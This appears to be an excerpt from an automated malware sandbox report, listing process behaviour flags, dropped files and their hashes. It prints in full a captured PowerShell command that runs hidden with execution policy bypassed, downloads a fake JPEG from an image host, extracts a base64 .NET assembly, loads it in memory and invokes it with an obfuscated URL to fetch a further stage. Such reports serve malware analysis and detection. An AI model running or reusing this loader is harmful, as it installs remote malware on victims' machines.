- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2540 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypss -NoProfile -command "$imageUrl = 'https://uploaddeimagens.com.br/images/004/563/621/original/universo_vbs.jpeg?1690931855';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('Fiber.Home');$method = $type.GetMethod('VAI');$arguments = ,('txt.edn/842.15.67.08//:ptth');$method.Invoke($null, $arguments)"4⤵
- Blocklisted process makes network request
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:476
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
61KB
MD5f3441b8572aae8801c04f3060b550443
SHA14ef0a35436125d6821831ef36c28ffaf196cda15
SHA2566720349e7d82ee0a8e73920d3c2b7cb2912d9fcf2edb6fd98f2f12820158b0bf
SHA5125ba01ba421b50030e380ae6bbcd2f681f2a91947fe7fedb3c8e6b5f24dce9517abf57b1cf26cc6078d4bb53bde6fcfb2561591337c841f8f2cb121a3d71661b9
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize344B
MD571da7befc3e2853a5c3ad5968bd18a5b
SHA1ae96228ad1b3c172732f4cfac06e78ed438ad8ea
SHA256bee19d4cad85b9ea4c0e8b1662303823875aff0b33a5a58194d443f67c4540c1
SHA5128571fe275421093d36008d012b255064c875fbf15d801e35aa0d1310bb5fdb064c7df919e61b0f9482fcd743a26199ef7fd82d58f6fe545207bdc548054c70d1
-
Filesize
62KB
MD53ac860860707baaf32469fa7cc7c0192
SHA1c33c2acdaba0e6fa41fd2f00f186804722477639
SHA256d015145d551ecd14916270efad773bbc9fd57fad2228d2c24559f696c961d904
SHA512d62ad2408c969a95550fb87efda50f988770ba5e39972041bf85924275baf156b8bec309ecc6409e5acdd37ec175dea40eff921ab58933b5b5b5d35a6147567c
-
Filesize
163KB
MD59441737383d21192400eca82fda910ec
SHA1725e0d606a4fc9ba44aa8ffde65bed15e65367e4
SHA256bc3a6e84e41faeb57e7c21aa3b60c2a64777107009727c5b7c0ed8fe658909e5
SHA5127608dd653a66cd364392a78d4711b48d1707768d36996e4d38871c6843b5714e1d7da4b4cc6db969e6000cfa182bcb74216ef6823d1063f036fc5c3413fb8dcf
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\1R6TGYBM6559Q95G4OWW.temp
Filesize7KB
MD5d5daaf520df9ae529ade7d4ff91f39fb
SHA1d178b84600c0d203c693f0a80f8cc1328e7fe0bd
SHA256a226c617194599f1bdc2e23327592c3eacf60aece4b3281d3a2631c222240444
SHA5129f61df3886ca13f0793e30119175f57d992b9c8c521960f1ee595d7f0f118d407b96e3fafecf1c553f43325ea9a8a642ab94027145c6cf03d90e02c0d6af35ad
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize7KB
MD5d5daaf520df9ae529ade7d4ff91f39fb
SHA1d178b84600c0d203c693f0a80f8cc1328e7fe0bd
SHA256a226c617194599f1bdc2e23327592c3eacf60aece4b3281d3a2631c222240444
SHA5129f61df3886ca13f0793e30119175f57d992b9c8c521960f1ee595d7f0f118d407b96e3fafecf1c553f43325ea9a8a642ab94027145c6cf03d90e02c0d6af35ad
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize7KB
MD5d5daaf520df9ae529ade7d4ff91f39fb
SHA1d178b84600c0d203c693f0a80f8cc1328e7fe0bd
SHA256a226c617194599f1bdc2e23327592c3eacf60aece4b3281d3a2631c222240444
SHA5129f61df3886ca13f0793e30119175f57d992b9c8c521960f1ee595d7f0f118d407b96e3fafecf1c553f43325ea9a8a642ab94027145c6cf03d90e02c0d6af35ad
-
Filesize
176KB
MD517596fe61474e52c8750444ce076df60
SHA1bfdf51115154ece9bf0b6a5956565a0b4f6a0883
SHA2562677ac52033a1a7a7e5ee73009fd8f35bbf6c980768115e28d1af94217497d65
SHA512bab2b6502721602f4e126e4b8a620aa389a7faedbf4fa75b0e40474fd10dcff89b451319bb863a4a528e0feacb26d1f546f171fd31113a3296fd45b2442ae83f
-
Filesize
176KB
MD517596fe61474e52c8750444ce076df60
SHA1bfdf51115154ece9bf0b6a5956565a0b4f6a0883
SHA2562677ac52033a1a7a7e5ee73009fd8f35bbf6c980768115e28d1af94217497d65
SHA512bab2b6502721602f4e126e4b8a620aa389a7faedbf4fa75b0e40474fd10dcff89b451319bb863a4a528e0feacb26d1f546f171fd31113a3296fd45b2442ae83f